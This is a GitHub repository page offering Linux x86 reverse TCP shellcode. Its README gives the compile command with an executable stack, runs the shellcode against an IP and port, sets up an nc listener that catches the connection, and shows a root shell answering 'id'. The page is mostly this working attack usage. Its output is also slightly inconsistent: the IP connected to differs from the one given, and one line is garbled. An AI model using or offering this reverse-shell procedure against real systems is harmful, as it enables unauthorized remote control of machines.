Skip to content

Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)

Notifications You must be signed in to change notification settings

iCodeIN/Linux-x86-Reverse-Shell

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

Linux-x86-Reverse-Shell

    Linux/x86 Reverse TCP Shell with dynamic IP and port binding Shellcode (tested on Ubuntu 12.04 LTS)
    Usage: gcc -z execstack -o shell_reverse_tcp shell_reverse_tcp.c
    $ ./shell_reverse_tcp_shellcode 192.168.1.137 4444
    Connecting to 192.168.1.236 (0xec01a8c0):4444 (0x115c)
    Byte 26: c0
    Byte 27: a8
    Byte 28: 01
    Byte 29: ec

    $ nc -nlv 4444
    Listening on 0.0.0.0 4444
    Connection received on 192.168.1.137 45219
    id
    uid=0(root) gid=0(root) groups=0(root)es)

About

Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Assembly 51.3%
  • C 48.7%